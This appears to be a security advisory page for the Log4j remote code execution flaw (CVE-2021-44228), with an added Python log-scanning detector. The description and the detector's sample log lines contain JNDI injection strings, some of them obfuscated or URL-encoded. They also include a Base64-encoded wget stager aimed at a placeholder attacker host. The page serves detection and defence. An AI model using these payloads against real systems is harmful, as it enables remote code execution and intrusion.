CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability

Overview

Severity
N/A
Category
Remote Code Execution
Exploit Status
Actively Exploited
Publicly Disclosed
Yes
Patch Tuesday
2021-Dec
Released
2021-12-16
Last Updated
2022-01-20
EPSS Score
94.36% (percentile: 100.0%)

Description

Certain versions of Apache Log4j 2 are vulnerable to remote code execution: releases 2.0-beta9 through 2.14.1 are affected, 2.15.0 disabled message lookups by default, and 2.16.0 removed message lookups and disabled JNDI by default. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. In practice the attacker places a lookup string such as ${jndi:ldap://<attacker host>/a} in any field the application logs (an HTTP header, a username, a chat message); Log4j resolves the lookup, contacts the attacker's LDAP server, and loads the Java class it returns.

Microsoft is not aware of any impact to the security of our enterprise services and has not experienced any degradation in the reliability or availability of those services as a result of this vulnerability. The Microsoft services detailed in the Security Updates table require customers to take action by downloading and installing security updates to mitigate the risks posed by this vulnerability on their deployments. Other Microsoft services require customers to apply configuration changes to mitigate the risks. These are listed in the MSRC blog: Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 (Microsoft Security Response Center). Additional information can be found in the Security Product Blog: Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation (Microsoft Security Blog).

Recommended Actions

Download and install the security updates for the Microsoft services detailed in the Security Updates table. If we identify additional services which require customers to take action, we will notify them via Azure Service Health Notifications. If you are using any Microsoft services other than those explicitly listed there is no action required by you at this time. That statement covers the Microsoft-operated services themselves; Java applications you run on Azure compute (virtual machines, containers, App Service) that bundle their own Log4j 2 still have to be updated by you.

How to get notified of updates to this CVE

If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

Detection & Weaponization (5 sources)

Maturity: Detection

  • Metasploit modules: Log4Shell HTTP Scanner, MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell), Log4Shell HTTP Header Injection, UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell), VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
  • Nuclei templates: Apache Log4j2 Remote Code Injection
  • Sigma rules: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon, Log4j RCE CVE-2021-44228 Generic, Log4j RCE CVE-2021-44228 in Fields
  • YARA rules: expl_log4j_cve_2021_44228.yar, SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1, SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard, SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21, SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21, SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1, SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
  • GitHub PoC: 399 repositories
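The detection logic behind the generic and obfuscation-oriented rules listed above, as an added Python example that is not code from this page, from MSRC, or from the Sigma/YARA rule sets named here. It undoes URL encoding (including double encoding) and the lookup-nesting tricks used to hide the string (${lower:j}, ${upper:n}, ${::-j}, ${env:NOPE:-j}), then matches ${jndi:<scheme>:...} and tries to recover a Base64-encoded command from the payload path, a pattern used by JNDIExploit-style tooling. The access-log lines are constructed for this example; the addresses are RFC 5737 documentation ranges and the paths are placeholders, not observed traffic.

```python
"""Detect CVE-2021-44228 (Log4Shell) JNDI lookup strings in log lines.

Added example (not code from this page or from the Sigma/YARA rule sets it
lists). It normalizes URL encoding and Log4j lookup obfuscation, then matches
${jndi:<scheme>:...} and extracts any Base64-encoded command from the payload.
"""
import base64
import re
from urllib.parse import unquote

# Lookup-nesting tricks seen in exploitation attempts. Innermost lookups contain
# no '$', '{' or '}', so they are resolved first; the loop repeats until stable.
#   ${lower:j} / ${upper:n}   -> j / n  (case-transform lookups; case is irrelevant
#                                        for matching, so the argument is kept as-is)
#   ${::-j} / ${env:NOPE:-j}  -> j      (Log4j "key:-default" syntax with no such key)
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The de-obfuscated lookup: ${jndi:ldap://...}, ${jndi:rmi://...}, ${jndi:dns://...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(.*?)\}", re.IGNORECASE | re.DOTALL)
# Runs of Base64 characters inside the payload; '/' is a Base64 character, so a
# path such as /Command/Base64/<cmd> comes out as one run and is split below.
_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def normalize(text: str) -> str:
    """Undo (possibly repeated) URL encoding and nested lookup obfuscation."""
    prev = None
    while text != prev:
        prev = text
        text = unquote(text)                            # %24%7Bjndi -> ${jndi
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def _decode_command(payload: str):
    """First Base64 token in the payload that decodes to printable ASCII.

    Each run is tried as suffixes starting at its '/' boundaries, shortest
    first, so /Basic/Command/Base64/<cmd> yields <cmd> rather than the whole path.
    """
    for run in _B64.findall(payload):
        starts = [0] + [i + 1 for i, ch in enumerate(run) if ch == "/"]
        for start in reversed(starts):
            tok = run[start:]
            try:
                raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            except ValueError:            # binascii.Error is a ValueError subclass
                continue
            if raw and raw.isascii() and raw.decode("ascii").isprintable():
                return raw.decode("ascii")
    return None


def find_jndi(line: str) -> list:
    """One finding per JNDI lookup in the line: scheme, target, decoded command."""
    return [
        {"scheme": m.group(1).lower(), "target": m.group(2),
         "decoded": _decode_command(m.group(2))}
        for m in _JNDI.finditer(normalize(line))
    ]


def scan(lines) -> list:
    """(line index, finding) pairs for every JNDI lookup found in the lines."""
    return [(i, f) for i, line in enumerate(lines) for f in find_jndi(line)]


# Constructed sample access-log lines (RFC 5737 documentation addresses, not real traffic).
CMD = "wget http://198.51.100.7/x.sh"     # hypothetical stager command carried in Base64
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',                                # plain User-Agent injection
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-r}mi://198.51.100.7:1099/Exploit}"',    # nested obfuscation
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',  # URL-encoded
    '192.0.2.10 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:12:00:05 +0000] "GET /report?fmt=${date:yyyy-MM-dd} HTTP/1.1" 200 88 "-" "-"',  # lookup, not JNDI
    '203.0.113.8 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/' + base64.b64encode(CMD.encode()).decode() + '}"',
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG):
        print(f"line {i}: jndi scheme={f['scheme']} target={f['target']} decoded={f['decoded']}")
```

The normalizer only unwraps the lookup forms that carry no side effects (case transforms and default values); it does not evaluate ${env:...} or ${sys:...} against the scanner's own environment, which is the trap to avoid when writing a de-obfuscator for this bug. Treat `scheme` as the alerting field: ldap, ldaps, rmi, dns and iiop are the ones seen in exploitation, and dns alone usually means a scanner probing for callbacks.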

Affected Products (15)

Azure

  • Azure Spring Cloud
  • Cosmos DB Kafka Connector
  • Events Hub Extension
  • Minecraft Java Edition
  • Azure Arc-enabled Data Services
  • Azure Databricks
  • Azure VMware Solution
  • Azure Data Lake Store Java client SDK
  • Azure Data Lake Store Java tool
  • Azure Application Insights Java SDK

System Center

  • Microsoft Defender for IoT

SQL Server

  • SQL Server 2019 Big Data Clusters

Developer Tools

  • Team Foundation Server
  • Azure DevOps
  • Azure DevOps Server

Security Updates (5)

Revision History

  • 2021-12-16: Information published.
  • 2021-12-20: Added Azure DevOps, Azure DevOps Server, and Team Foundation Server to the Security Updates table with links to more information about CVE-2021-44228. This is an informational change only.
  • 2021-12-21: (1) Moved the products in the Customer Guidance Table to the Security Updates table. (2) Updated the Publicly Disclosed and Exploited settings to Yes. These are informational changes only. (3) Added Azure Data Lake Store Java tool and Azure Data Lake Store Java client SDK to the Security Updates table.
  • 2021-12-22: Added Azure Application Insights Java SDK to the Security Updates table. This is an informational update only.
  • 2022-01-20: Updated the executive summary with current information. This is an informational change only.